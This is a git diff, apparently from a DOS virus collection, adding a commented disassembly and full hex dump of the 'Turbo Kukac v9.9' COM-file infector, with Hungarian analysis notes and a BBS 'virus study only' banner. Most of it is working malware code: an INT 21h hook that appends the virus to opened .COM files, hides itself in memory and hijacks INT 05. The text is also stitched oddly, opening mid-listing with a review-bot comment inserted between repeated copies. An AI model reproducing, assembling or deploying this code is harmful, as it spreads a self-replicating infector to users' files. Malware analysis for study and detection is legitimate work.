+28F8:0204 E99A00 JMP 02A1 ;nem COM ugrs az erede- + ;ti INT 21h-ra +28F8:0207 B82E43 MOV AX,432E ;'.C' AX-be +28F8:020A 26 ES: +28F8:020B 3B45FE CMP AX,[DI-02] ; '.C' ? +28F8:020E 7403 JZ 0213 ;biztos hogy COM file! 
+28F8:0210 E98E00 JMP 02A1 ;nem COM ugrs az erede- + ;ti INT 21h-ra + ;File nyitsa + +28F8:0213 B43D MOV AH,3D ;file nyits +28F8:0215 B002 MOV AL,02 ;rs/olvass +28F8:0217 E89600 CALL 02B0 ;INT 21h hivsa +28F8:021A 7303 JNB 021F ;ha nincs hiba +28F8:021C E98200 JMP 02A1 ;hiba esetn ugrs az + ;eredeti INT 21h-ra +28F8:021F 8BD8 MOV BX,AX ;file kezel + + ;File mret ellenrzs + +28F8:0221 B90000 MOV CX,0000 +28F8:0224 BA0000 MOV DX,0000 +28F8:0227 B002 MOV AL,02 ;file vgre +28F8:0229 B442 MOV AH,42 ;file pointer mozgatsa +28F8:022B E88200 CALL 02B0 ;INT 21h hivsa +28F8:022E 3D00FE CMP AX,FE00 +28F8:0231 736E JNB 02A1 ;ha nem nagyobb a file + ;65024 byte-nl +28F8:0233 2D0300 SUB AX,0003 ;JMP+op hossza + + ;Fertzend file eredeti 4 byte jnak + ;beolvassa + +28F8:0236 2E CS: +28F8:0237 A3BE02 MOV [02BE],AX ;letrolja +28F8:023A B442 MOV AH,42 ;file pointer mozgatsa +28F8:023C B000 MOV AL,00 ;file elejre +28F8:023E B90000 MOV CX,0000 +28F8:0241 BA0000 MOV DX,0000 +28F8:0244 E86900 CALL 02B0 ;INT 21h hivsa +28F8:0247 B43F MOV AH,3F ;olvass file-bl +28F8:0249 B90400 MOV CX,0004 ;4 byte +28F8:024C BAC102 MOV DX,02C1 ;ide tegye +28F8:024F 8CCF MOV DI,CS +28F8:0251 8EDF MOV DS,DI ;DS=CS +28F8:0253 E85A00 CALL 02B0 ;INT 21h hivsa +28F8:0256 B005 MOV AL,05 +28F8:0258 3A06C402 CMP AL,[02C4] ;utols byte=5 ? +28F8:025C 7443 JZ 02A1 ;igen, ugrs az eredeti + ;INT 21h -ra + + ;Fertzend file-ba a virusra + ;mutat JMP+op. kirsa (4 byte) + +28F8:025E B442 MOV AH,42 ;file pointer mozgatsa +28F8:0260 B000 MOV AL,00 ;file elejre +28F8:0262 B90000 MOV CX,0000 +28F8:0265 8BD1 MOV DX,CX +28F8:0267 E84600 CALL 02B0 ;INT 21h hivsa +28F8:026A B0E9 MOV AL,E9 ;JMP kdja +28F8:026C 2E CS: +28F8:026D A2BD02 MOV [02BD],AL ;letrolja +28F8:0270 B005 MOV AL,05 +28F8:0272 2E CS: +28F8:0273 A2C002 MOV [02C0],AL +28F8:0276 B90400 MOV CX,0004 ;4 byte +28F8:0279 BABD02 MOV DX,02BD ;JMP + op. 
kezdete +28F8:027C 8CC8 MOV AX,CS +28F8:027E 8ED8 MOV DS,AX +28F8:0280 B440 MOV AH,40 ;kirs file-ba +28F8:0282 E82B00 CALL 02B0 ;INT 21h hivsa + + ;Program megfertzse 0200h byte kirsa + ;azaz a virus mgmsolsa + +28F8:0285 B442 MOV AH,42 ;file pointer mozgatsa +28F8:0287 B002 MOV AL,02 ;file vgre +28F8:0289 B90000 MOV CX,0000 +28F8:028C 8BD1 MOV DX,CX +28F8:028E E81F00 CALL 02B0 ;INT 21h hivsa +28F8:0291 BA0001 MOV DX,0100 ;0100h ofset-tl +28F8:0294 B90002 MOV CX,0200 ;0200h byte virus hossza +28F8:0297 B440 MOV AH,40 ;kirs file-ba +28F8:0299 E81400 CALL 02B0 ;INT 21h hivsa +28F8:029C B43E MOV AH,3E ;file zrsa +28F8:029E E80F00 CALL 02B0 ;INT 21h hivsa +28F8:02A1 5E POP SI +28F8:02A2 5F POP DI +28F8:02A3 5A POP DX +28F8:02A4 59 POP CX +28F8:02A5 5B POP BX +28F8:02A6 58 POP AX +28F8:02A7 07 POP ES +28F8:02A8 1F POP DS + +28F8:02A9 90 NOP +28F8:02AA 2E CS: +28F8:02AB FF2EB702 JMP FAR [02B7] ;eredeti INT 21h-ra +28F8:02AF CF IRET + ;Eredeti INT 21h hivsa +28F8:02B0 9C PUSHF ;elmenti mivel az IRET + ;visszamenti a flag-eket +28F8:02B1 2E CS: +28F8:02B2 FF1EB702 CALL FAR [02B7] ;eredeti INT 21h hivsa +28F8:02B6 C3 RET + +28F8:02B7 16 PUSH SS +28F8:02B8 130C ADC CX,[SI] +28F8:02BA 0202 ADD AL,[BP+SI] +28F8:02BC 00E9 ADD CL,CH +28F8:02BE 06 PUSH ES +28F8:02BF 06 PUSH ES +28F8:02C0 05E906 ADD AX,06E9 +28F8:02C3 0405 ADD AL,05 +28F8:02C5 0100 ADD [BX+SI],AX +28F8:02C7 0000 ADD [BX+SI],AL +28F8:02C9 0001 ADD [BX+DI],AL +28F8:02CB F0 LOCK +28F8:02CC 0901 OR [BX+DI],AX +28F8:02CE 54 PUSH SP +28F8:02CF 7572 JNZ 0343 +28F8:02D1 62 DB 62 +28F8:02D2 6F DB 6F +28F8:02D3 204B75 AND [BP+DI+75],CL +28F8:02D6 6B DB 6B +28F8:02D7 61 DB 61 +28F8:02D8 63 DB 63 +28F8:02D9 2039 AND [BX+DI],BH +28F8:02DB 2E CS: +28F8:02DC 3920 CMP [BX+SI],SP +28F8:02DE 2020 AND [BX+SI],AH +28F8:02E0 2020 AND [BX+SI],AH +28F8:02E2 2024 AND [SI],AH +28F8:02E4 0000 ADD [BX+SI],AL + +28F8:02FC 0000 ADD [BX+SI],AL +28F8:02FE FA CLI +28F8:02FF 00C7 ADD BH,AL + +Megjegyzs: + + Nagyon primitv virus, de megvan a maga 
zsenialitsa, kt legyet + t egy csapsra, pl COPY parancs esetn megnyit egy com file-t,s + ha a virus a memriban van, akkor mg a msoland file-t megfer- + tzi, s a COPY mr a fertztt file-t msolja! Nem igazn kr- + tkony vrus, pusztn mindentt ott akar lenni, s nehezteni a + felhasznl(k) munkjt! Mrete nagyon kicsi, mindssze 512 byte! + Hinyoznak a vrusbl az (tapasztalataim szerint) eddigi virusok- + ban fellelhet ellenrzsek, gondolok itt arra, hogy ha megtrtnik + egy file-ba (hoz) val kirs nem ellenrzi a program hogy valban + kirta-e azt az X byte-ot. Tovbb mikor rezidess (nem {hivatalo- + san} bejegyzetten) teszi magt nem mdostja az MCB. 13. byte-jn + lv RAM tetejnek a paragrafus cmtt a sajt maga lltal lefog- + lalt mrettel (kivons!), mint PL. a Yankee Doodle! A Yankee mg + azt is megnzi, hogy amit meg akar fertzni az az utols mem. + blokkban van-e, br abban kell lennie, mert a DOS egy programnak + odaadja a teljes szabad memrit, ami van... + + +DUMP: + +28F8:0100 E8 00 00 90 5E 50 51 B0-21 B4 35 CD 21 8C C0 3D ....^PQ.!.5.!..= +28F8:0110 00 40 72 24 83 EE 03 BA-C1 02 81 EA 00 01 03 F2 .@r$............ +28F8:0120 8B 1C 8B 4C 02 89 1E 00-01 89 0E 02 01 8C D8 8E ...L............ +28F8:0130 C0 59 58 BB 00 01 FF E3-8C D8 48 8E D8 A1 03 00 .YX.......H..... +28F8:0140 2D 41 00 A3 03 00 8C C8-8E D8 A1 02 00 2D 00 08 -A...........-.. +28F8:0150 8E C0 BF 00 01 83 EE 03-B9 00 02 F3 A4 8C 06 C7 ................ +28F8:0160 02 B9 6C 01 89 0E C5 02-FF 2E C5 02 8C C1 8C D8 ..l............. +28F8:0170 26 A3 CB 02 B8 00 01 26-A3 C9 02 8C C0 8E D8 BA &......&........ +28F8:0180 C7 01 B0 05 B4 25 CD 21-B4 35 B0 21 CD 21 2E 89 .....%.!.5.!.!.. +28F8:0190 1E B7 02 8C C3 2E 89 1E-B9 02 B8 D9 01 8B D0 8B ................ +28F8:01A0 C1 8E D8 B0 21 B4 25 CD-21 8B 16 C1 02 8B 0E C3 ....!.%.!....... +28F8:01B0 02 A1 CB 02 8E D8 89 16-00 01 89 0E 02 01 8E C0 ................ +28F8:01C0 59 58 2E FF 2E C9 02 90-50 1E 52 8C C8 8E D8 BA YX......P.R..... 
+28F8:01D0 CE 02 B4 09 E8 D9 00 EB-F6 90 80 FC 3D 74 03 E9 ............=t.. +28F8:01E0 C7 00 90 1E 06 50 53 51-52 57 56 8B FA 8C DE 8E .....PSQRWV..... +28F8:01F0 C6 B0 00 B9 32 00 FC F2-AE 83 EF 03 B8 4F 4D 26 ....2........OM& +28F8:0200 3B 05 74 03 E9 9A 00 B8-2E 43 26 3B 45 FE 74 03 ;.t......C&;E.t. +28F8:0210 E9 8E 00 B4 3D B0 02 E8-96 00 73 03 E9 82 00 8B ....=.....s..... +28F8:0220 D8 B9 00 00 BA 00 00 B0-02 B4 42 E8 82 00 3D 00 ..........B...=. +28F8:0230 FE 73 6E 2D 03 00 2E A3-BE 02 B4 42 B0 00 B9 00 .sn-.......B.... +28F8:0240 00 BA 00 00 E8 69 00 B4-3F B9 04 00 BA C1 02 8C .....i..?....... +28F8:0250 CF 8E DF E8 5A 00 B0 05-3A 06 C4 02 74 43 B4 42 ....Z...:...tC.B +28F8:0260 B0 00 B9 00 00 8B D1 E8-46 00 B0 E9 2E A2 BD 02 ........F....... +28F8:0270 B0 05 2E A2 C0 02 B9 04-00 BA BD 02 8C C8 8E D8 ................ +28F8:0280 B4 40 E8 2B 00 B4 42 B0-02 B9 00 00 8B D1 E8 1F .@.+..B......... +28F8:0290 00 BA 00 01 B9 00 02 B4-40 E8 14 00 B4 3E E8 0F ........@....>.. +28F8:02A0 00 5E 5F 5A 59 5B 58 07-1F 90 2E FF 2E B7 02 CF .^_ZY[X......... +28F8:02B0 9C 2E FF 1E B7 02 C3 16-13 0C 02 02 00 E9 06 06 ................ +28F8:02C0 05 E9 06 04 05 01 00 00-00 00 01 F0 09 01 .............. + + ;Kirand szveg kezdete +28F8:02C0 54 75 Tu +28F8:02D0 72 62 6F 20 4B 75 6B 61-63 20 39 2E 39 20 20 20 rbo Kukac 9.9 +28F8:02E0 20 20 20 24 $ + +28F8:02E0 00 00 00 00-00 00 00 00 00 00 00 00 ............ +28F8:02F0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 FA 00 ................ +28F8:0300 C7 . 
+
+;****************************************************************************;
+; ;
+; -=][][][][][][][][][][][][][][][=- ;
+; -=] P E R F E C T C R I M E [=- ;
+; -=] +31.(o)79.426o79 [=- ;
+; -=] [=- ;
+; -=] For All Your H/P/A/V Files [=- ;
+; -=] SysOp: Peter Venkman [=- ;
+; -=] [=- ;
+; -=] +31.(o)79.426o79 [=- ;
+; -=] P E R F E C T C R I M E [=- ;
+; -=][][][][][][][][][][][][][][][=- ;
+; ;
+; *** NOT FOR GENERAL DISTRIBUTION *** ;
+; ;
+; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
+; Around Among the General Public. It Will be Very Useful for Learning how ;
+; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
+; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
+; Experience can Turn it Into a far More Malevolent Program Than it Already ;
+; Is. Keep This Code in Responsible Hands! ;
+; ;
+;****************************************************************************;
diff --git a/MSDOS/Virus.MSDOS.Unknown.turbo99.lst b/MSDOS/Virus.MSDOS.Unknown.turbo99.lst
new file mode 100644
index 00000000..a288e8e7
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.turbo99.lst
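Review bot: The file is stored under an `.asm` extension but holds a DEBUG-style unassembled listing (address, opcode bytes, mnemonic and comment per line, e.g. `28F8:0100 E80000 CALL 0103`) followed by a hex `DUMP:` block, which no assembler accepts as source, so a one-line header such as `; DEBUG 'U' listing of Turbo Kukac v9.9 (not assemblable source); Hungarian analysis notes` would stop readers treating it as buildable code. The Hungarian commentary also appears to have lost its accented characters (`Magyarzat`, `memriban`, `Kvri Lszl`), presumably a code-page conversion during upload, which leaves the analysis notes partly unreadable; if the original DOS code-page bytes are still available, re-adding the file with an explicit encoding would preserve them. The companion `MSDOS/Virus.MSDOS.Unknown.turbo99.lst` added in the next hunk carries the same blob index (`a288e8e7`) and is therefore a byte-identical duplicate; one of the two should be dropped, and `.lst` is the name that matches the content.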
@@ -0,0 +1,426 @@ +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; +TURBO KUKAC v9.9 virus unassembled list: + `90.07.21. + +Magyarzat: Kvri Lszl + Tel.: (41) 21-822 07-13:20 mh. + 21-033 18:00- + + + +28F8:0100 E80000 CALL 0103 ;IP rtke az SI-be +28F8:0103 90 NOP ;ez lesz a bzis offset +28F8:0104 5E POP SI +28F8:0105 50 PUSH AX +28F8:0106 51 PUSH CX +28F8:0107 B021 MOV AL,21 +28F8:0109 B435 MOV AH,35 +28F8:010B CD21 INT 21 ;INT 21h cmnek lekr- + ;dezse +28F8:010D 8CC0 MOV AX,ES +28F8:010F 3D0040 CMP AX,4000 ;a memriban van ? +28F8:0112 7224 JB 0138 ;nincs! +28F8:0114 83EE03 SUB SI,+03 ;bzis offset -3 + ;(3 byte hosszu a JMP + ;+ az operandusa!) +28F8:0117 BAC102 MOV DX,02C1 +28F8:011A 81EA0001 SUB DX,0100 ;0100h offset levonsa + ;(COM file sajtossga!) 
+28F8:011E 03F2 ADD SI,DX +28F8:0120 8B1C MOV BX,[SI] ;JMP kdja + az operan- + ;dus fele +28F8:0122 8B4C02 MOV CX,[SI+02] ;JMP operandusa + 1 byte +28F8:0125 891E0001 MOV [0100],BX ;eredeti prg kezdet +28F8:0129 890E0201 MOV [0102],CX ;letrolsa +28F8:012D 8CD8 MOV AX,DS +28F8:012F 8EC0 MOV ES,AX ;ES=DS +28F8:0131 59 POP CX +28F8:0132 58 POP AX +28F8:0133 BB0001 MOV BX,0100 ;ugrs offset-je +28F8:0136 FFE3 JMP BX ;EREDETI PROGRAM VGRE- + ;HAJTSA + + ;HA MG NINCS A MEMRIBAN +28F8:0138 8CD8 MOV AX,DS ;sajt szegmense +28F8:013A 48 DEC AX ;sajt seg-1= MCB. seg. +28F8:013B 8ED8 MOV DS,AX ;DS=MCB. szegmense +28F8:013D A10300 MOV AX,[0003] ;DOS lltal a programnak + ;foglalt memriablokk + ;hossza +28F8:0140 2D4100 SUB AX,0041 ;virus hosszt levonja + ;belle (41*16 byte) +28F8:0143 A30300 MOV [0003],AX ;visszateszi igy a DOS + ;lltal ltott teljes + ;memria nagysga a prg. + ;kilpse utn (41*16 + ;byte-tal) kevesebb lesz + ;Hasonlan csinlja ezt + ;a YANKEE DOODLE is, s + ;ezzel azt ri el, hogy + ;semmilyen + ;System Storage Map + ;programmal nem mutat- + ;hat ki a virus jele- + ;lte a memriban! + ;A PCTOOLS system info + ;kimutatja, azaz csak + ;annyit ltni, hogy a + ;fizikai RAM mret 640K + ;s a DOS lltal ltott + ;az 639k byte! Igy k- + ;vetkeztetni lehet... 
+28F8:0146 8CC8 MOV AX,CS +28F8:0148 8ED8 MOV DS,AX ;DS=CS +28F8:014A A10200 MOV AX,[0002] ;PSP-ben a RAM tetej- + ;nek a paragrafuscme +28F8:014D 2D0008 SUB AX,0800 +28F8:0150 8EC0 MOV ES,AX ;virus j szegmense +28F8:0152 BF0001 MOV DI,0100 +28F8:0155 83EE03 SUB SI,+03 +28F8:0158 B90002 MOV CX,0200 ;virus hossza +28F8:015B F3 REPZ +28F8:015C A4 MOVSB ;virus msolsa az j + ;szegmensbe +28F8:015D 8C06C702 MOV [02C7],ES ;j szegmens trolsa +28F8:0161 B96C01 MOV CX,016C ;belpsi pont +28F8:0164 890EC502 MOV [02C5],CX ;trolsa +28F8:0168 FF2EC502 JMP FAR [02C5] ;ugrs az j szegmens + ;01c6 offset-re + ;UJ SZEGMENSBEN A BELPSI PONT +28F8:016C 8CC1 MOV CX,ES +28F8:016E 8CD8 MOV AX,DS ;ahonnan msolta magt +28F8:0170 26 ES: +28F8:0171 A3CB02 MOV [02CB],AX ;RGI PRG. segment cm +28F8:0174 B80001 MOV AX,0100 +28F8:0177 26 ES: +28F8:0178 A3C902 MOV [02C9],AX ;0100h offset trolsa +28F8:017B 8CC0 MOV AX,ES +28F8:017D 8ED8 MOV DS,AX +28F8:017F BAC701 MOV DX,01C7 ;INT 05 - HARD COPY j + ;offset-je +28F8:0182 B005 MOV AL,05 +28F8:0184 B425 MOV AH,25 +28F8:0186 CD21 INT 21 ;INT 05 ellopsa +28F8:0188 B435 MOV AH,35 +28F8:018A B021 MOV AL,21 +28F8:018C CD21 INT 21 ;INT 21h cm lekrdez- + ;se +28F8:018E 2E CS: +28F8:018F 891EB702 MOV [02B7],BX ;INT 05h offset (rgi) +28F8:0193 8CC3 MOV BX,ES +28F8:0195 2E CS: +28F8:0196 891EB902 MOV [02B9],BX ;INT 05h segment (rgi) +28F8:019A B8D901 MOV AX,01D9 ;j INT 21h offset cm +28F8:019D 8BD0 MOV DX,AX +28F8:019F 8BC1 MOV AX,CX +28F8:01A1 8ED8 MOV DS,AX +28F8:01A3 B021 MOV AL,21 +28F8:01A5 B425 MOV AH,25 +28F8:01A7 CD21 INT 21 ;INT 21h ellopsa +28F8:01A9 8B16C102 MOV DX,[02C1] ;EREDETI JMP + AZ +28F8:01AD 8B0EC302 MOV CX,[02C3] ;OPERANDUSA!!! +28F8:01B1 A1CB02 MOV AX,[02CB] ;EREDETI PRG. SEG!!! 
+28F8:01B4 8ED8 MOV DS,AX +28F8:01B6 89160001 MOV [0100],DX ;eredeti JMP kdja +28F8:01BA 890E0201 MOV [0102],CX ;s operandusa +28F8:01BE 8EC0 MOV ES,AX +28F8:01C0 59 POP CX +28F8:01C1 58 POP AX +28F8:01C2 2E CS: +28F8:01C3 FF2EC902 JMP FAR [02C9] ;EREDETI PROGRAM FUTTA- + ;TSA! + ;j INT 05 - HARD COPY rutin +28F8:01C7 90 NOP +28F8:01C8 50 PUSH AX +28F8:01C9 1E PUSH DS +28F8:01CA 52 PUSH DX +28F8:01CB 8CC8 MOV AX,CS +28F8:01CD 8ED8 MOV DS,AX + ;VGTELEN CIKLUS! +28F8:01CF BACE02 MOV DX,02CE ;szveg kezdete + ;Turbo Kukac v9.9 +28F8:01D2 B409 MOV AH,09 ;print string +28F8:01D4 E8D900 CALL 02B0 ;rgi INT 21h hivsa +28F8:01D7 EBF6 JMP 01CF ;jra! + + ;j INT 21h rutin +28F8:01D9 90 NOP +28F8:01DA 80FC3D CMP AH,3D ;file nyitsa alfunkci? +28F8:01DD 7403 JZ 01E2 ;igen +28F8:01DF E9C700 JMP 02A9 ;nem ugrsa az eredeti + ;INT 21h-ra +28F8:01E2 90 NOP +28F8:01E3 1E PUSH DS +28F8:01E4 06 PUSH ES +28F8:01E5 50 PUSH AX +28F8:01E6 53 PUSH BX +28F8:01E7 51 PUSH CX +28F8:01E8 52 PUSH DX +28F8:01E9 57 PUSH DI +28F8:01EA 56 PUSH SI + + ;File kiterjeszts ellenrzse + +28F8:01EB 8BFA MOV DI,DX ;file PATH kezdete +28F8:01ED 8CDE MOV SI,DS +28F8:01EF 8EC6 MOV ES,SI ;ES=DS (igy a file PATH + ;tvtele!) +28F8:01F1 B000 MOV AL,00 ;PATH lezr nulla +28F8:01F3 B93200 MOV CX,0032 ;file secifikci hossza +28F8:01F6 FC CLD ;elre +28F8:01F7 F2 REPNZ +28F8:01F8 AE SCASB ;PATH lezr 0 byte ke- + ;resse +28F8:01F9 83EF03 SUB DI,+03 ;-3 igy a kiterjeszts + ;kezdet+1 pozicira mu- + ;tat +28F8:01FC B84F4D MOV AX,4D4F ;'OM' AX-be +28F8:01FF 26 ES: +28F8:0200 3B05 CMP AX,[DI] ; 'OM' a vge ? +28F8:0202 7403 JZ 0207 ;igen valszinleg COM + ;file +28F8:0204 E99A00 JMP 02A1 ;nem COM ugrs az erede- + ;ti INT 21h-ra +28F8:0207 B82E43 MOV AX,432E ;'.C' AX-be +28F8:020A 26 ES: +28F8:020B 3B45FE CMP AX,[DI-02] ; '.C' ? +28F8:020E 7403 JZ 0213 ;biztos hogy COM file! 
+28F8:0210 E98E00 JMP 02A1 ;nem COM ugrs az erede- + ;ti INT 21h-ra + ;File nyitsa + +28F8:0213 B43D MOV AH,3D ;file nyits +28F8:0215 B002 MOV AL,02 ;rs/olvass +28F8:0217 E89600 CALL 02B0 ;INT 21h hivsa +28F8:021A 7303 JNB 021F ;ha nincs hiba +28F8:021C E98200 JMP 02A1 ;hiba esetn ugrs az + ;eredeti INT 21h-ra +28F8:021F 8BD8 MOV BX,AX ;file kezel + + ;File mret ellenrzs + +28F8:0221 B90000 MOV CX,0000 +28F8:0224 BA0000 MOV DX,0000 +28F8:0227 B002 MOV AL,02 ;file vgre +28F8:0229 B442 MOV AH,42 ;file pointer mozgatsa +28F8:022B E88200 CALL 02B0 ;INT 21h hivsa +28F8:022E 3D00FE CMP AX,FE00 +28F8:0231 736E JNB 02A1 ;ha nem nagyobb a file + ;65024 byte-nl +28F8:0233 2D0300 SUB AX,0003 ;JMP+op hossza + + ;Fertzend file eredeti 4 byte jnak + ;beolvassa + +28F8:0236 2E CS: +28F8:0237 A3BE02 MOV [02BE],AX ;letrolja +28F8:023A B442 MOV AH,42 ;file pointer mozgatsa +28F8:023C B000 MOV AL,00 ;file elejre +28F8:023E B90000 MOV CX,0000 +28F8:0241 BA0000 MOV DX,0000 +28F8:0244 E86900 CALL 02B0 ;INT 21h hivsa +28F8:0247 B43F MOV AH,3F ;olvass file-bl +28F8:0249 B90400 MOV CX,0004 ;4 byte +28F8:024C BAC102 MOV DX,02C1 ;ide tegye +28F8:024F 8CCF MOV DI,CS +28F8:0251 8EDF MOV DS,DI ;DS=CS +28F8:0253 E85A00 CALL 02B0 ;INT 21h hivsa +28F8:0256 B005 MOV AL,05 +28F8:0258 3A06C402 CMP AL,[02C4] ;utols byte=5 ? +28F8:025C 7443 JZ 02A1 ;igen, ugrs az eredeti + ;INT 21h -ra + + ;Fertzend file-ba a virusra + ;mutat JMP+op. kirsa (4 byte) + +28F8:025E B442 MOV AH,42 ;file pointer mozgatsa +28F8:0260 B000 MOV AL,00 ;file elejre +28F8:0262 B90000 MOV CX,0000 +28F8:0265 8BD1 MOV DX,CX +28F8:0267 E84600 CALL 02B0 ;INT 21h hivsa +28F8:026A B0E9 MOV AL,E9 ;JMP kdja +28F8:026C 2E CS: +28F8:026D A2BD02 MOV [02BD],AL ;letrolja +28F8:0270 B005 MOV AL,05 +28F8:0272 2E CS: +28F8:0273 A2C002 MOV [02C0],AL +28F8:0276 B90400 MOV CX,0004 ;4 byte +28F8:0279 BABD02 MOV DX,02BD ;JMP + op. 
kezdete +28F8:027C 8CC8 MOV AX,CS +28F8:027E 8ED8 MOV DS,AX +28F8:0280 B440 MOV AH,40 ;kirs file-ba +28F8:0282 E82B00 CALL 02B0 ;INT 21h hivsa + + ;Program megfertzse 0200h byte kirsa + ;azaz a virus mgmsolsa + +28F8:0285 B442 MOV AH,42 ;file pointer mozgatsa +28F8:0287 B002 MOV AL,02 ;file vgre +28F8:0289 B90000 MOV CX,0000 +28F8:028C 8BD1 MOV DX,CX +28F8:028E E81F00 CALL 02B0 ;INT 21h hivsa +28F8:0291 BA0001 MOV DX,0100 ;0100h ofset-tl +28F8:0294 B90002 MOV CX,0200 ;0200h byte virus hossza +28F8:0297 B440 MOV AH,40 ;kirs file-ba +28F8:0299 E81400 CALL 02B0 ;INT 21h hivsa +28F8:029C B43E MOV AH,3E ;file zrsa +28F8:029E E80F00 CALL 02B0 ;INT 21h hivsa +28F8:02A1 5E POP SI +28F8:02A2 5F POP DI +28F8:02A3 5A POP DX +28F8:02A4 59 POP CX +28F8:02A5 5B POP BX +28F8:02A6 58 POP AX +28F8:02A7 07 POP ES +28F8:02A8 1F POP DS + +28F8:02A9 90 NOP +28F8:02AA 2E CS: +28F8:02AB FF2EB702 JMP FAR [02B7] ;eredeti INT 21h-ra +28F8:02AF CF IRET + ;Eredeti INT 21h hivsa +28F8:02B0 9C PUSHF ;elmenti mivel az IRET + ;visszamenti a flag-eket +28F8:02B1 2E CS: +28F8:02B2 FF1EB702 CALL FAR [02B7] ;eredeti INT 21h hivsa +28F8:02B6 C3 RET + +28F8:02B7 16 PUSH SS +28F8:02B8 130C ADC CX,[SI] +28F8:02BA 0202 ADD AL,[BP+SI] +28F8:02BC 00E9 ADD CL,CH +28F8:02BE 06 PUSH ES +28F8:02BF 06 PUSH ES +28F8:02C0 05E906 ADD AX,06E9 +28F8:02C3 0405 ADD AL,05 +28F8:02C5 0100 ADD [BX+SI],AX +28F8:02C7 0000 ADD [BX+SI],AL +28F8:02C9 0001 ADD [BX+DI],AL +28F8:02CB F0 LOCK +28F8:02CC 0901 OR [BX+DI],AX +28F8:02CE 54 PUSH SP +28F8:02CF 7572 JNZ 0343 +28F8:02D1 62 DB 62 +28F8:02D2 6F DB 6F +28F8:02D3 204B75 AND [BP+DI+75],CL +28F8:02D6 6B DB 6B +28F8:02D7 61 DB 61 +28F8:02D8 63 DB 63 +28F8:02D9 2039 AND [BX+DI],BH +28F8:02DB 2E CS: +28F8:02DC 3920 CMP [BX+SI],SP +28F8:02DE 2020 AND [BX+SI],AH +28F8:02E0 2020 AND [BX+SI],AH +28F8:02E2 2024 AND [SI],AH +28F8:02E4 0000 ADD [BX+SI],AL + +28F8:02FC 0000 ADD [BX+SI],AL +28F8:02FE FA CLI +28F8:02FF 00C7 ADD BH,AL + +Megjegyzs: + + Nagyon primitv virus, de megvan a maga 
zsenialitsa, kt legyet + t egy csapsra, pl COPY parancs esetn megnyit egy com file-t,s + ha a virus a memriban van, akkor mg a msoland file-t megfer- + tzi, s a COPY mr a fertztt file-t msolja! Nem igazn kr- + tkony vrus, pusztn mindentt ott akar lenni, s nehezteni a + felhasznl(k) munkjt! Mrete nagyon kicsi, mindssze 512 byte! + Hinyoznak a vrusbl az (tapasztalataim szerint) eddigi virusok- + ban fellelhet ellenrzsek, gondolok itt arra, hogy ha megtrtnik + egy file-ba (hoz) val kirs nem ellenrzi a program hogy valban + kirta-e azt az X byte-ot. Tovbb mikor rezidess (nem {hivatalo- + san} bejegyzetten) teszi magt nem mdostja az MCB. 13. byte-jn + lv RAM tetejnek a paragrafus cmtt a sajt maga lltal lefog- + lalt mrettel (kivons!), mint PL. a Yankee Doodle! A Yankee mg + azt is megnzi, hogy amit meg akar fertzni az az utols mem. + blokkban van-e, br abban kell lennie, mert a DOS egy programnak + odaadja a teljes szabad memrit, ami van... + + +DUMP: + +28F8:0100 E8 00 00 90 5E 50 51 B0-21 B4 35 CD 21 8C C0 3D ....^PQ.!.5.!..= +28F8:0110 00 40 72 24 83 EE 03 BA-C1 02 81 EA 00 01 03 F2 .@r$............ +28F8:0120 8B 1C 8B 4C 02 89 1E 00-01 89 0E 02 01 8C D8 8E ...L............ +28F8:0130 C0 59 58 BB 00 01 FF E3-8C D8 48 8E D8 A1 03 00 .YX.......H..... +28F8:0140 2D 41 00 A3 03 00 8C C8-8E D8 A1 02 00 2D 00 08 -A...........-.. +28F8:0150 8E C0 BF 00 01 83 EE 03-B9 00 02 F3 A4 8C 06 C7 ................ +28F8:0160 02 B9 6C 01 89 0E C5 02-FF 2E C5 02 8C C1 8C D8 ..l............. +28F8:0170 26 A3 CB 02 B8 00 01 26-A3 C9 02 8C C0 8E D8 BA &......&........ +28F8:0180 C7 01 B0 05 B4 25 CD 21-B4 35 B0 21 CD 21 2E 89 .....%.!.5.!.!.. +28F8:0190 1E B7 02 8C C3 2E 89 1E-B9 02 B8 D9 01 8B D0 8B ................ +28F8:01A0 C1 8E D8 B0 21 B4 25 CD-21 8B 16 C1 02 8B 0E C3 ....!.%.!....... +28F8:01B0 02 A1 CB 02 8E D8 89 16-00 01 89 0E 02 01 8E C0 ................ +28F8:01C0 59 58 2E FF 2E C9 02 90-50 1E 52 8C C8 8E D8 BA YX......P.R..... 
+28F8:01D0 CE 02 B4 09 E8 D9 00 EB-F6 90 80 FC 3D 74 03 E9 ............=t.. +28F8:01E0 C7 00 90 1E 06 50 53 51-52 57 56 8B FA 8C DE 8E .....PSQRWV..... +28F8:01F0 C6 B0 00 B9 32 00 FC F2-AE 83 EF 03 B8 4F 4D 26 ....2........OM& +28F8:0200 3B 05 74 03 E9 9A 00 B8-2E 43 26 3B 45 FE 74 03 ;.t......C&;E.t. +28F8:0210 E9 8E 00 B4 3D B0 02 E8-96 00 73 03 E9 82 00 8B ....=.....s..... +28F8:0220 D8 B9 00 00 BA 00 00 B0-02 B4 42 E8 82 00 3D 00 ..........B...=. +28F8:0230 FE 73 6E 2D 03 00 2E A3-BE 02 B4 42 B0 00 B9 00 .sn-.......B.... +28F8:0240 00 BA 00 00 E8 69 00 B4-3F B9 04 00 BA C1 02 8C .....i..?....... +28F8:0250 CF 8E DF E8 5A 00 B0 05-3A 06 C4 02 74 43 B4 42 ....Z...:...tC.B +28F8:0260 B0 00 B9 00 00 8B D1 E8-46 00 B0 E9 2E A2 BD 02 ........F....... 